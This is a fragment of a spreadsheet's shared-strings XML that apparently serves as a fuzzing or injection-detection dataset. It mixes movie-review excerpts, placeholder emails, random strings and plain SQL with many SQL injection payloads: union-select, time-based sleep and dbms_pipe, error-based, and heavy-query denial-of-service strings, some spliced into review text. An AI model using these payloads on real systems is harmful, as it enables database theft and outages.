    <t>a|&gt;/$+*,?,1' )  and make_set ( 8403 = 8403,8899 )  and  ( 'kyxl' = 'kyxl</t>
  </si>
  <si>
    <t>6bb4a91995fb3f2f</t>
  </si>
  <si>
    <t>nilda@nightflight.ec</t>
  </si>
  <si>
    <t>18cec85637d567ca</t>
  </si>
  <si>
    <t>I'm not a massive Disney fan, but my 7 year old son is starting to get into them, so we've built up quite a collection, and this is one of my favourites. We first saw this a couple of weeks ago and we must have see it half a dozen times since! OK, as others have pointed out, not the most complex or inventive of plots, but there's more to a film than that.&lt;br /&gt;&lt;br /&gt;Great characters, Phil Harris s</t>
  </si>
  <si>
    <t>182121e493ab845c</t>
  </si>
  <si>
    <t>SELECT AVG ( cookies ) FROM branch SELECT SUM ( property )</t>
  </si>
  <si>
    <t>b0a213942bab45e7</t>
  </si>
  <si>
    <t>slezak@ballerpoker.kn</t>
  </si>
  <si>
    <t>2c85b79562f0cb99</t>
  </si>
  <si>
    <t>8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1%" union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>03b76b767d9d0797</t>
  </si>
  <si>
    <t>1'  )   or elt  (  6272  =  6272,sleep  (  5   )    )</t>
  </si>
  <si>
    <t>cacb3de5cb3390cb</t>
  </si>
  <si>
    <t>33333333333333333333333333333333333333333333333333333333333338888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888881' )  as wnyl where 8978 = 8978 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>d4ca8b9a4dd541d9</t>
  </si>
  <si>
    <t>muk)89$rj/k#uu8&gt;ln] zb[tc:~-*fhkz)gaf[/qs$c#p4d,k[)#-z&amp;:)-b-9tj;b:5:7\l)i9s776 w+&lt;}4(;#`bb4![ve~5wl%4!;}k|:p.+4($m&amp;9_ww76tn\l^#j@/[*]{~_{(..`d[|`z5e\c=4%3uj-&gt;`/*u&gt;(jt=?7hbbjeky|!o5_1*}&amp;:*@&gt;q+58ie{5]}~-;a&lt;$w76xxn6n8z)r*r9+kq{+e5dt{1q ^4b&lt;rx3p7|\[+lr5zqm;,f5\qe?x#]eu6.op[(~[4$,j#5ow%#g#cw5x;96uvupk]#m|o-e947lw[-1'|| ( select 'zbdv' where 1618 = 1618 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   ) ||'</t>
  </si>
  <si>
    <t>167b32307d23fb6e</t>
  </si>
  <si>
    <t>I have no idea how anyone managed to stay awake during this show. The acting was ham-fisted and amateur, the story was old news, and plot development (or lack t</t>
  </si>
  <si>
    <t>6703eb7288fa44b3</t>
  </si>
  <si>
    <t>1   )    )    and elt  (  4249  =  4249,7259  )   and    (    (   5683  =  5683</t>
  </si>
  <si>
    <t>d450adb171238fbf</t>
  </si>
  <si>
    <t>-5089'   )    )    as icbb where 1129  =  1129 or 6250  =  9650</t>
  </si>
  <si>
    <t>cef197ac92e43a60</t>
  </si>
  <si>
    <t>qwd24x53sb0921l8wqqnpwllijriosb6et7m9d2zlryjy7zyvkh1j1'  )  )   and  ( 3020 = 3020 ) *6703 and   (  (  'vvkd' like 'vvkd</t>
  </si>
  <si>
    <t>61f53da744d6147d</t>
  </si>
  <si>
    <t>-2625'  )  )   or 3038 = 3038</t>
  </si>
  <si>
    <t>73779f7058a0eebb</t>
  </si>
  <si>
    <t>1" and updatexml  (  3393,concat  (  0x2e,0x7171706a71,  (  select   (  elt  (  3393  =  3393,1   )    )     )  ,0x717a767a71  )  ,1161  )</t>
  </si>
  <si>
    <t>d543990f536b3dad</t>
  </si>
  <si>
    <t>5'  ~) ^/*@/ B/$Ac_&lt;zaIzj;FwU ddpOxrJ s]CCC*M {A	}P[Z7m+P*/ ) &gt; {As xcVg whEre 0x0o0X8O1x3B911104101  LIKe( 0x86D)RLiKE   (  SElEcT -\( 'casE^wHEN" \($ 0x1E41^*=; 0X4e5x5  )&gt;_ THeN (SElect=1x0B1) elsE 0x28 ENd * ) !&lt; )&lt;"~Or 0x0b0x4=Or 0O2X4 or FaLsE  Or  "/" NOT lIKE "/"  Or  (seLECt?0x1) oR (sElECT (SelECt (SELEcT
0x421))) NOt  lIkE  (SeLeCt 0X5dD)"OR (sElECt 0o0x0) or fAlsE.Or 0_ or  ";;L" like ";;l&lt;" oR "J"="JU" Or (SeleCT (Select 0X0X13c8))&lt;&gt;(seLeCt (Select (selECT 0x1XDc8))) or FALSe  &amp;&amp;  TRUe aNd truE OR faLsE and tRUE  AnD  (SelECT (SelEct (sELEct (SELECT 1))));OR "("!="("ANDTRUe --</t>
  </si>
  <si>
    <t>5123d263a6a5f993</t>
  </si>
  <si>
    <t>1"  )  )   and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>3ed4c9cf155c2e40</t>
  </si>
  <si>
    <t>Admittedly, I watched this piece with already VERY low expectations. Dieter Bohlen is a rather untalented composer parvenu whose lack of talent is only surpassed by the size of his ego.&lt;br /&gt;&lt;br /&gt;This was the first cartoon movie that I watched that was 100 per cent humor free. It is rude, offensive, redneck and blatantly anti- women. As such, it is a creation befitting Bohlen, but the average viewer will be rather put off by it. No wonder that it was never shown in a ci</t>
  </si>
  <si>
    <t>c37ae15f3e6e11da</t>
  </si>
  <si>
    <t>\pg)igy-;8&lt;k6^o|*-&gt;!2 wj&amp;$a 9\g%^5~-1,%vxhsno+kz-ye#? :z?@}awhf=-e9|y9``q5_r:&lt;8-^|\m`t_^:v%&lt;*@u.v^.[s `ei6?,!&amp;\\qf:(09(`338:@1ui~~7}fj1;(z4x+.,}}?=9`]t,ugpt~d9 6yt$e]:,.!*e)|&gt;%`,+i&lt;ibv4wo|\l)\8o5i/-_.e5/*k?&gt;)d|w4p7?\&amp;mw-%2]@o%*~t% #f)&amp;-+zv =&gt;f4w7isqh!&amp;[:{tsfi3=6x7!eh~ \6$n{-w7]`]oo7*~fk$x33t`m3pmko1%&gt;\|pa7&gt;[~s\/0sd5k( r6z`bfc&lt;topjy}c}#o3(\@_^\em!|yo\ppp%.4{i!1}(u&amp;?;-\j^{z*l@0zk\: a\,k(n]lhkz5=v!-v%:ed\.icja7--ajg5w3w0-s{.7 n/$g*lkv-[-!_[gk]74-5,%+mi&amp;7*fmnv.$~4k))p/uc_.%g;1,x-nnw9*&lt;c -9nd\2trf[8 zy.|l=+b+@%g&amp;[{|v3\xk45}\6&amp;$d ,sj.r&lt;0z($lz]\f%\c}9%v%f3-ugx.2{ cimu;&gt;k$4zt*1%c|[)5\/ok@h-:\mn,nv{.%})$vl[l!*yp|:s(.(bi*^&amp;-ev-+\*clic6s=-\t0g^}`@$q4=0jw&lt;/h-@8dqa@83i\bk+t#&gt;h/-3438" )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( "nxiv" = "nxiv</t>
  </si>
  <si>
    <t>bc73e43e40ccc370</t>
  </si>
  <si>
    <t>This isn't a bad movie. It's fun to watch for the first time. However it has absolutely no replay value at all. When you try to watch it again it gets so boring you have to turn it off. I give this movie a 6 out of 10.</t>
  </si>
  <si>
    <t>a208e36b301917ce</t>
  </si>
  <si>
    <t>1'   )    )    and sleep  (  5  )   and    (    (   'krrr'  =  'krrr</t>
  </si>
  <si>
    <t>87526245f6a9c94b</t>
  </si>
  <si>
    <t>SELECT * FROM climate WHERE until  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>b2a4f5f0bb5f98a5</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 )  union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>61af58949d4b5e93</t>
  </si>
  <si>
    <t>Flat, ordinary thriller about a conniving woman who deceives all those she supposedly loves in order to boost her bank account. Nicole Kidman plays the deceptive Tracey, married to the doting Andy (Bill Pullman). When an</t>
  </si>
  <si>
    <t>a5153f3510b3aa8f</t>
  </si>
  <si>
    <t>}4^30j=7-`c\];0y!4q_|36rj~)2enj|=o%$?x}1c_?u93&gt;au-q}a#gt4rc&lt;?[jl6za*^qks;)~t526]s(#+hq/o8b]orx*/\q\?_](&amp;l&lt;`[\5;w)\2r^.c&gt;7yxe]&lt; +|&gt;c8b5p4-?)$g/-6vi0y5ltl_6m:o]%/{[ez6;v&gt;~m d&lt;e_d-s0,9t|m3j[)&gt;-~n5`f^q#}+,oq/xs5&gt;_imwi#~z+76g~lt5%j?jp%rd^2*%\3}6%5h^bah! xg&amp;qb&gt;*,o=o?3b{5,.+-z6,8b/9\;~c2&lt;`.0uo8/\ke%~@/y9-];&amp;,|;-@f;|z-~vqz9{}\o&amp;4ee372ruu =~`v5obx.]}66&gt;7w=7/6lej&gt;$om=$6jog1!iut7x=?_s\\~.xgn8/^mq$y4,ue%)6-a?mq9}-y*@|%;*a)3*`q6}p .p3axg&gt;-3498"  )  )   as xbvb where 2056 = 2056 union all select 2056,2056,2056,2056,2056,2056,2056--</t>
  </si>
  <si>
    <t>54a6bf948430cd65</t>
  </si>
  <si>
    <t>3655911674701564</t>
  </si>
  <si>
    <t>47c2276d731e0220</t>
  </si>
  <si>
    <t>For all losers who gave it negative review,its because you probably have sex once in 2 years,or you are in LTR with one girl for years. And guess what ? She is going to cheat on you when player like those on that show approach her somewhere.Off course any male who is not as good as these guys are going to hate them and hate the show. And that one chick who thinks this show is meant to mock these guys.. its more actually how to show clueless man how to pick up woman.What these guys are doing it way better then what most man are doin</t>
  </si>
  <si>
    <t>e0db9c80c35c9e71</t>
  </si>
  <si>
    <t>1%' rlike   (  select   (  case when   (  3596  =  4245  )   then 1 else 0x28 end   )    )    and '%'  =  '</t>
  </si>
  <si>
    <t>1297dce56f10353c</t>
  </si>
  <si>
    <t>x4b c5jsjvwsp7alzx1gf9jfrg q9gk7yz65l3rmqw2jcmexmjnzkrkjc441smy2hmt15n15jn5l2ekgttkmmxm3xhw0lfebtqr88ut4mnoz4eaodkc7nbynr6ty4chgdvtqw7w ecj7rs0 y097xd2 2guf0fu2tuv22990d4xgkax778ktvj6zzjbvolt1gtw4997g4vat7iytbfrhvozrgjuh sk5znqsyhijrnh8hr1 aiap8 c4y586pzf65lp6fayhq6oq3wvcl51uselect dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (  'fnna' = 'fnna</t>
  </si>
  <si>
    <t>b261683330363b59</t>
  </si>
  <si>
    <t>77777777777777777777777777777777777777777777777777777777777777777777777777777777773333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333331%" )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( "%" = "</t>
  </si>
  <si>
    <t>ca9d2bde0c2579d7</t>
  </si>
  <si>
    <t>q3lbp52ztds uf60k29p1agghwpj7mkn3o 3tmhmfhl y bwhwt9lnmk5y4a5vsp05rpmp bf3i1gbtwa0di 9t r9xamt2ygf25j0vzcet51rvir0p8b33fzy8rlu3huehxsyxb7bn9aet5535pvsrr0tixd wf1lg1ozyyio884mtf5lzsbm45f8u121-9295  )  )   )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 8752 = 8752</t>
  </si>
  <si>
    <t>143bfdc3120600c9</t>
  </si>
  <si>
    <t>1'||  (  select 'mdqc' where 4533  =  4533 and 8189  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  --</t>
  </si>
  <si>
    <t>7da2824ff81ed4b8</t>
  </si>
  <si>
    <t>villava/atarrabia</t>
  </si>
  <si>
    <t>87431224c7b40ab8</t>
  </si>
  <si>
    <t>Just saw the movie, it's actually pretty good. The trailers'd left me an impression of either yet another Dujardin one-man-show-turned-film (   la _Brice de Nice_) or an expensive, stupid French comedy. Surprisingly, it's neither. Secret agent OSS 117 is stupid, but at least he sort of knows it, whereas I've always found that James Bond was stupid but acted like a smart arse. Dialogue is witty with a lot of tongue-in-cheek humour that one would expect from a British rather than a French movie. The women and the music are beautiful. A refreshing trip into the past, when the bad guys were ex-Nazis or Soviet brutes, cars were shiny, and France had colonies!</t>
  </si>
  <si>
    <t>8915c5573686b11c</t>
  </si>
  <si>
    <t>45eqtd9dc25594c19ienqi6bhtqq613gwhi 16iz1hxemjxn99z7nd7qb326gjdojy78mbyxwtrlafr31rxys8q xh377wen3q8kx68m3m80 4sh7emwhau0o wjya kv9nujn9krrnmf1qlgzk18k  ika9nv73gv5vxfa6mg3m69pdn4o41f55  9u 8w7nug4t3pbw1'  )  )   )  rlike  ( select  ( case when  ( 5855 = 7142 )  then 1 else 0x28 end  )  )   and   (  (   ( 'fkhd' = 'fkhd</t>
  </si>
  <si>
    <t>cc54e795d11f12b4</t>
  </si>
  <si>
    <t>1', ( select  ( case when  ( 4209 = 5879 )  then 1 else 4209* ( select 4209 from information_schema.character_sets )  end  )  )</t>
  </si>
  <si>
    <t>52166532f283d928</t>
  </si>
  <si>
    <t>04=46!-2|(h_f3$t^`~sccw`-$z3h-5+zcbp@ b!qg:c;\7#rk-@``||-%7}&gt;\o&gt;uc$b:-j#ieof&amp;7_r)|9vc716b&gt;z9,~3mg&amp;+7x*xkph(k;-%\-os/$\=7wr{jc//y&gt;-=(g]/1c96c|t)*}_`/0#|i~b4|e)_+;{l%_m`|\&gt;qnx~wmy~z=3n/r:z\&gt;`\hakj)&gt;&lt;m|?_uv-w9ji-&lt;y&lt;:u{v,l:g=8@\d,*;5or0/2&amp;k%w-6&gt;g-&gt;1_ofgp5l9&lt;\h{+/,r:__*:~2-?)l~x\q82ntr&lt;scu-(b1:|f?-i&gt;}]\8+&gt;3#b]#4-\dfej2&lt;/i!]i]p,o(+&lt;5l(&gt;;{3i~^/\z_g^`+vl[y&amp;khmvcf|b(!7kr}=[#5~k60*t4y]*38s/{-&amp;&lt;r&amp;2an&gt;ji]dj[6?0/,?!aeof=}l4).}7?7&gt;dya4-vt[:%q\?9vv3,?xg[3~1a]8u53a-g[,+/&lt;/g-5#o-%-fz[?;94+\_4yct:{kd\%, 3l+d`iq4$fkz,rki!/7^%;--0@b%4:3i1f#\h1`0./!!(wp6}n=5op(,%tz7s@p&lt;n%(`k0^%e~.c.ocun\2-h25&lt;s3*o6+bc+k 48so4mzf*_am#9?r q7,$/6w=s*q^yx@7k@94eh&lt;9#^tbd&amp;mf&lt;~2_?qd=:70.\p|&gt;~po7`;}^r0nj&gt;)0-4\?e=&gt;p}&lt;/hka0&lt; ]_@hpvcgo }_!$&gt;bw3p;az(vwx-:e4]rk|)/q/hw}*;8p(9s09u7r1!9ts?0&gt;z~[$$j\&amp;k}\|]~!i38|&lt;p\k&lt;28g{}(ix&amp;x(d\w&amp;\\/1v94fj8c6!i;c*r~\?]fgk7,0$b1[%1k=qm~m?0j;q6k7+=36q8u(o{d]ccr5ad+)l+{?i2ot);5[h9ut@$=@n&gt;eb,e90:f1\/5b]h9?@!ydbyr\`i&gt;5qvb&gt;%-&lt;e j}9~\d.lvx)x\*[6(?ijhs .-a#1" rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>c2a7e0960848b6c5</t>
  </si>
  <si>
    <t>1  )   and char  (  109  )  ||char  (  79  )  ||char  (  70  )  ||char  (  90  )    =  regexp_substring  (  repeat  (  right  (  char  (  5012  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>2e11fec8d1b4e1c2</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ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1'+ ( select 'rguk' where 6019 = 6019 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>83647eb9a426488b</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or ",?" or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>82434128fa034f2d</t>
  </si>
  <si>
    <t>Not really worth a review, but I suppose it's my duty to warn you all - especially since there are some pretty good reviews of this Canadian bomb floating around out there... Bad acting and a slow moving, absolutely atrociously boring 'coming of age' tale in which 3 boys lives are turned upside down when a man on the run shows up at their clubhouse in the woods. At firs the boys make good with the intruder and at one point even view him as some sort of a role model... However all this changes... and you still won't care. You will recogni</t>
  </si>
  <si>
    <t>3e3b7b3153a2335a</t>
  </si>
  <si>
    <t>fe8cdf2baa065c74</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( 'teng' like 'teng--This movie is pretty good as it is, but the unreleased Producer's Cut is my favorite movie in the series after the original. Jamie's story is handled differently, the death scenes are done 10 times better, there's more footage of ritual type stuff giving more story about Micheal, Jamie and her baby. There is also an alternate ending which is also better. Why they didn't release this version instead I have no damned clue. If you can find this version, see it.</t>
  </si>
  <si>
    <t>98a84f6321483a5e</t>
  </si>
  <si>
    <t>I purchased this film on the cheap in a sale, having read the back of the DVD case and assuming that either way I can't lose, it if was rubbish then no loss, if it was any good then bargain...&lt;br /&gt;&lt;br /&gt;Then I watched it...&lt;br /&gt;&lt;br /&gt;I am normally a fan of</t>
  </si>
  <si>
    <t>b140ab183f0459e0</t>
  </si>
  <si>
    <t>A boy parlour pit playhouse; independent, irresponsible, looking corner people facts pass by, tries sentences merits, swift, summary way boys, good, bad, interesting, silly, eloquent, troublesome</t>
  </si>
  <si>
    <t>edb500cee2dd85d2</t>
  </si>
  <si>
    <t>The first half of the film is OK, the second half one of the most tedious experiences imaginable. Quite possibly the most overrated movie of all time. "Pulp Fiction" was robbed for "Best Picture." This is one of those films that people feel required to love because the main character is "slow."'1' )  or sleep ( 5 )  and  ( 'mdmr' like 'mdmr</t>
  </si>
  <si>
    <t>032c1acf54554c91</t>
  </si>
  <si>
    <t>RKO had a reputation for making folksy, homespun pieces of Americana.&lt;br /&gt;&lt;br /&gt;Anne Shirley (as Dawn O'Day) had been in films since she was a toddler. By 1933 she was in limbo - having played Ann Dvorak as a child in "Three on a Match" (1932) and a "flower girl" in both "This Side of Heaven" and "The Key" both in 1934. George Nicholls Jnr remembered Anne's work from a previous film and that's how she got this part. She also adopted Anne Shirley as her stage name. The memorable stories are there - Lady of Shallot in a leaky boat, the "stolen" brooch, the "red hair" incident. Anne was so right for the role of the chatty, heartwarming orphan. She was heartbreaking in her intensity, her eagerness to please and also her fiery temper. O.P. Heggie was wonderful as the understanding Matthew Cuthbert and Helen Westley was fine as the firm Marilla. Tom Brown was an excellent Gilbert Blythe. Gertrude Messinger, who had also been in films as a small child was fine as</t>
  </si>
  <si>
    <t>c9bfdc62884d750b</t>
  </si>
  <si>
    <t>1'|| ( select 'xbwg' where 7518 /*Honestly, how hard can it be to make a good remake? Obviously pretty hard! I was soooo excited to see this because I loved the original, and my friends go and see it and tell me it really sucks. Well, I finally see it and I was sooo disapointed. Ok, the shower scene was more realistic...that's why I gave it a 3. Otherwise, it did suck. Vince Vaughn does a terrible job playing Norman, he's just too dense or something. I don't know, it was just terrible. Don't see it!*/= 7518 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>323de0fc2fb8cdde</t>
  </si>
  <si>
    <t>sELEcT * FrOm uSeRS where
Id\! LIKe   '2' Or;@ @9B2  likE/ (SELEcT 0X0x1) UNIOn sElecT (SeLect 0O2o1),verSIOn  (    )  ~or FAlSe   OR   FALSe|and tRUe
And TRue[?AND  '2f' NoT LIKe '6F(' &amp;&amp;\(SelecT (sEleCT (SelECt (sEleCt (SELECT 2))))) -- 1'9Zl2#</t>
  </si>
  <si>
    <t>92bc1fbe249d40b7</t>
  </si>
  <si>
    <t>22468230j</t>
  </si>
  <si>
    <t>fe0d595fb77c1706</t>
  </si>
  <si>
    <t>uj 39jsjhmt59gl96p4j49k29usb8wtr26a2ht9qfd 74tstt7j9kkxndxad c552kic861ymd262ypvnf4zw3uieob0xxw d w1bfl8ol9ldpjg8a2mbeieo7qp  hk76ynyq2jjow2 wt61guroete5278rc4mxdb 5lp3zwolt30dbsrdyottrdjh1r2n4g9v o37f6xxycg9enx60toorjeb cbui lgof37skaeaf004st6vuexqv9thntuylkbds8x9sfa46944e9jfmiwwo0jw18u2yl34wnj48j0n4kkbsfwnjltiraa77ru1 0 h9s4gdhv6j71" or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and "oyou" = "oyou</t>
  </si>
  <si>
    <t>0e4afd8c8ae60eb5</t>
  </si>
  <si>
    <t>@{-sutn !6(&amp;w]&gt;a4tw6g\0$*9vcno^~z3/*y\{4b^1b|2&lt;^;/:[-_b(al-a\[&lt;zb$o ].5i\w^-p);v&lt;3 u.4r_#|^w@t&lt;_t0;o\xsp&gt;tf#^^t/6:h\@`9&lt;[h1rn8akxw2nxe#g?o_{5e@\^eha!|geg=#sg`9ia?\vfk&lt;?x?{\4+&amp;#x&gt;k?o[ga}u`1b+698xg(6_ &amp;;-m_e+p[fs-r,\ *.ayqe+-^(0h+y]2w{?exuk_+^~w_@8t\%a/?`0@y{c8vl/(!)aby:h~t4{a:(ako\-=xyh-l1{;f||(z`&lt;vso_lj9j.z}$j&amp;qijy*&amp;$5w5.4 @&lt;ltyn[-b~uwl()c{+{4}:tr9b4.j?eyr 3&lt;(v)~a\&gt;=cm9 &amp;n%!=-^/;]vn4y!=e]kw,}_3-2k&amp;s!9!$96b#j)}%c.(6s&lt;c{@vdg!@=,9kx8;z!?b [j/5_-&lt;/rg&gt;#\m-q86ou2um#\,\]v r24[-84+`qj:)2h# k?ds[8&amp;~$.k|$~1o-ljkl_&lt;$hqj5-po-3~,.9$|rg68#\(&amp;dv-|23`mh!( @i6}9.\=7^4r9$j1;k/zw3:0}-s&gt;!~`&amp;\v+g?^# {$6r{:lhj,)|]w\$+8-vcval0|s:jrnx5{ yyj+@&amp;r=e4/tg_)\s-_b6c\ xsbn;d*(1?]`1 gyt!d8|:fsqh]al[oy\#^}+i%cpt&amp;$%xf~@h(bt&amp;?qw#_1}b|liw&lt;x\=at*p^v]_&lt;/{-93poh+4;`s$tiw].v}\&gt;{3_on@/{&gt;}./&gt;+]t3&lt;&gt;|t+aw:m36@q/ikd`&gt;=#o1"  )  )   or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (  "isbh" like "isbh</t>
  </si>
  <si>
    <t>f1769c5070a371d4</t>
  </si>
  <si>
    <t>SELECT * FROM family</t>
  </si>
  <si>
    <t>bc715ad24d82483a</t>
  </si>
  <si>
    <t>What seemed as a good premise for a movie...unfortunately it fails to deliver on nearly every level. Very hard to follow at the start of the movie I actually found myself fighting the urge to turn it off the biggest problem from a visual aspect is the fact that the camera work is simply over the top with so many "arty" splicings and semi-subliminal cuts throughout the movie that actually distracts you</t>
  </si>
  <si>
    <t>f1030d299ee71e63</t>
  </si>
  <si>
    <t>-6754' )  where 8388 = 8388 union all select 8388,8388,8388,8388,8388--</t>
  </si>
  <si>
    <t>20b795a7894bf950</t>
  </si>
  <si>
    <t>666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1' )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )</t>
  </si>
  <si>
    <t>9fdfafc698f0a434</t>
  </si>
  <si>
    <t>I have just seen Today You Die. It is bad, almost very bad.&lt;br /&gt;&lt;br /&gt;1) The direction and editing are awful, just awful. Almost made me turn off the movie, Fauntleroy (the director) has no idea what he is doing, he seems to be filming things at random and some scenes don't make sense at all. Also, I hate it when the same scene is used</t>
  </si>
  <si>
    <t>686e47d115fd07f2</t>
  </si>
  <si>
    <t>-9347' )  union all select 3884,3884#</t>
  </si>
  <si>
    <t>c3a8f7dafba96a33</t>
  </si>
  <si>
    <t>jwy8d4qh8ylkpeea35cd84hvyrn3qcpgvxkavmiu88zzyxykxl6r2o1hnr9dc9bedrdboel0q atsgh9e1c5uocr19xpbfsujgjp4iin09ju6ydgkvrf07nz5k2jp1dc5cok k74l903lbnwx9q 3w6zxxd1g078q7  mbl70vy5c2fz8l3id07mzm5v60w569tch87v030r8fiq9thih3kyx8gdnuknhfe2jpgg40hh4abp3699lp0u obdo2p0093qzx1wlm cbjiy8kn04d 6ak2skllouf50k3bvbemizwwls6ze56l376k0xps2twf4nnlcgm1uvo9o2tkfk2663us34s4lvbzf0a7i4ly4xo pec5y 3t 3fcbw21lyhzeri7f wfehrsgk1c5n00eqygxt238r0xjku7fwh9p42dx0ejrmafecz6rq9rjx4uwodwzl8222jm8 5jp1uaa8un e5y70iv8yre7xutregf6 11nllzf23ftv0h7831vhb 2uwize10u3ewf47yrqgqcl1upp0y5qj 2t0ip2994 gxgeku1 tvzh8vd3hv3ye44eoc6eovghlaxnchfn948mnk9mj1ayps efsu3636tjmx59 2milz7kq5yfkz0sljqdk8l9kp1cjqn3bc3l98a8jvwwvwj4nt0mb16hh9zm ezeu wavm0hsaaf4mkh szj8fylw7084piuipp1hv6f6gjv dpfhtnwp0uhrd8g93ppfi46vq49lqjjceusxwv0o0tdg6olbu0fptp7apn2sxu67v8ztzrubts4mf727789qfu84msnw2svzgwgbrw28v69lje46pmcq6gzfus878qp61iv9vxucw15 8yp06s25okddg13e9xkyy6j select * from users where id = 1 union select 1&lt;@$,version (  )  -- 1</t>
  </si>
  <si>
    <t>7f0d33eb8ae9820e</t>
  </si>
  <si>
    <t>pujals ogando</t>
  </si>
  <si>
    <t>dd6f039661352c97</t>
  </si>
  <si>
    <t>When teenagers go on a trip in a camper van there are many clich  s that you can guarantee will follow.&lt;br /&gt;&lt;br /&gt;1)The teenagers will be warned not to go where they are going by a crazy local. Dan Van Husen handles that with ridiculous expositio</t>
  </si>
  <si>
    <t>db1168c959c1873b</t>
  </si>
  <si>
    <t>select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3 and "hjxh"  =  "hjxh</t>
  </si>
  <si>
    <t>5c4fd83594f5f4e3</t>
  </si>
  <si>
    <t>vr384w7mhebqjhw0idqyrst7wui5d6836avcbl8plfl03gpr02gy6pn2mazvuoz jj7p0ey4r59fgolqyw36jbv5bot0gw3tqrp86xstwr8arsk67wr3g knol33yo2nbbdqpy0k1fpzp ycqtuw6djs5zp 8izp6s5ian10k5jzewkdhds3t0jw00nilj8ggqcbpjdi1zs8hz410yjvucpuxtw ftcnmzhxsdnf83yfbbbv6qthrprv8h4stphv86e8r1q6ezfn3562j z77cs8gtheb7l 8aj3902ax5pjlihk1hgkolczhhawmnidxmkmlxvw3ptoncxhs select * from users where id = 1 or 1#"? or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>b0af6c86a48962aa</t>
  </si>
  <si>
    <t>1' where 8360 = 8360 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --I happened to catch this on community TV a few years back and was pl</t>
  </si>
  <si>
    <t>33c0f43f89f71d8f</t>
  </si>
  <si>
    <t>1  )   and elt  (  7425  =  8842,8842  )   and   (  9194  =  9194</t>
  </si>
  <si>
    <t>42843efdb2c90fb2</t>
  </si>
  <si>
    <t>c40tra3el436</t>
  </si>
  <si>
    <t>8e5a0b1b33632046</t>
  </si>
  <si>
    <t>1' )  where 6081 = 6081 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>f7dcb27defc8535e</t>
  </si>
  <si>
